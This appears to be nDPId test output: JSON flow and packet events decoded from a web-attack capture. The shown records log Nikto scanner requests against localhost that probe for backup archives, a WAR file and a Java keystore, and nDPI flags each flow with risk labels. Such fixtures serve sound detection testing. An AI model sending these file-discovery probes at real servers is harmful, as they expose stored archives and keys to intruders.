+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":301,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277157,"flow_last_seen":1576420277157,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277157,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50146,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":1,"flow_last_seen":1576420277157,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277157,"pkt":"AAAAAAAAAAAAAAAACABFAADJ8y5AAEAGSP5\/AAABfwAAAcPiH5D9g8umqBgGFIAYAED+vQAAAQEICp1m\/M2dZvzNR0VUIC8xMjcuMC4wLjEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277157,"flow_last_seen":1576420277157,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277157,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50146,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":302,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277159,"flow_last_seen":1576420277159,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277159,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50148,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":1,"flow_last_seen":1576420277159,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277159,"pkt":"AAAAAAAAAAAAAAAACABFAADJ4mhAAEAGWcR\/AAABfwAAAcPkH5ACw9rweorXCIAYAED+vQAAAQEICp1m\/M+dZvzPR0VUIC8xMjcuMC4wLjEudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":302,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277159,"flow_last_seen":1576420277159,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277159,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50148,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277160,"flow_last_seen":1576420277160,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277160,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50150,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":1,"flow_last_seen":1576420277160,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277160,"pkt":"AAAAAAAAAAAAAAAACABFAAC9m2BAAEAGoNh\/AAABfwAAAcPmH5DB5aPVANERlIAYAED+sQAAAQEICp1m\/NCdZvzQR0VUIC8xLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277160,"flow_last_seen":1576420277160,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277160,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50150,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":304,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277162,"flow_last_seen":1576420277162,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277162,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50152,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":1,"flow_last_seen":1576420277162,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277162,"pkt":"AAAAAAAAAAAAAAAACABFAAC9DilAAEAGLhB\/AAABfwAAAcPoH5AB6DautSQRQ4AYAED+sQAAAQEICp1m\/NKdZvzRR0VUIC8xLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277162,"flow_last_seen":1576420277162,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277162,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50152,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":305,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277164,"flow_last_seen":1576420277164,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277164,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50154,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":1,"flow_last_seen":1576420277164,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277164,"pkt":"AAAAAAAAAAAAAAAACABFAADFIABAAEAGHDF\/AAABfwAAAcPqH5Cuoid2XcqpP4AYAED+uQAAAQEICp1m\/NSdZvzTR0VUIC8xMjcwMC50YXIuYnoyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":305,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277164,"flow_last_seen":1576420277164,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277164,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50154,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277165,"flow_last_seen":1576420277165,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277165,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50156,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":1,"flow_last_seen":1576420277165,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277165,"pkt":"AAAAAAAAAAAAAAAACABFAADFxNJAAEAGd15\/AAABfwAAAcPsH5ANevxccArVDoAYAED+uQAAAQEICp1m\/NWdZvzVR0VUIC8xMjcwMC50YXIuYnoyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277165,"flow_last_seen":1576420277165,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277165,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50156,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277166,"flow_last_seen":1576420277166,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277166,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50158,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":1,"flow_last_seen":1576420277166,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277166,"pkt":"AAAAAAAAAAAAAAAACABFAADFbqBAAEAGzZB\/AAABfwAAAcPuH5Bs\/lYWJw4fzoAYAED+uQAAAQEICp1m\/NadZvzWR0VUIC8xMjcuMC4wLjEuamtzIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277166,"flow_last_seen":1576420277166,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277166,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50158,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277168,"flow_last_seen":1576420277168,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277168,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50160,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_packet_id":1,"flow_last_seen":1576420277168,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277168,"pkt":"AAAAAAAAAAAAAAAACABFAADFNC9AAEAGCAJ\/AAABfwAAAcPwH5DG1AyisQj3YYAYAED+uQAAAQEICp1m\/NidZvzYR0VUIC8xMjcuMC4wLjEuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":308,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277168,"flow_last_seen":1576420277168,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277168,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50160,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277170,"flow_last_seen":1576420277170,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277170,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50162,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":1,"flow_last_seen":1576420277170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277170,"pkt":"AAAAAAAAAAAAAAAACABFAADDKQdAAEAGEyx\/AAABfwAAAcPyH5DtUBGKsAbmZ4AYAED+twAAAQEICp1m\/NqdZvzZR0VUIC8xMjcuMC4wLndhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277170,"flow_last_seen":1576420277170,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277170,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50162,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277171,"flow_last_seen":1576420277171,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277171,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50164,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_packet_id":1,"flow_last_seen":1576420277171,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277171,"pkt":"AAAAAAAAAAAAAAAACABFAADDFtRAAEAGJV9\/AAABfwAAAcP0H5DIKS5flUY6Y4AYAED+twAAAQEICp1m\/NudZvzbR0VUIC8xMjcuMC4wLndhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":310,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277171,"flow_last_seen":1576420277171,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277171,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50164,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277172,"flow_last_seen":1576420277172,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277172,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50166,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":1,"flow_last_seen":1576420277172,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277172,"pkt":"AAAAAAAAAAAAAAAACABFAADBjc9AAEAGrmV\/AAABfwAAAcP2H5CR+bVBDfA+SoAYAED+tQAAAQEICp1m\/NydZvzcR0VUIC8xMjcuMC50Z3ogSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":311,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277172,"flow_last_seen":1576420277172,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277172,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50166,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 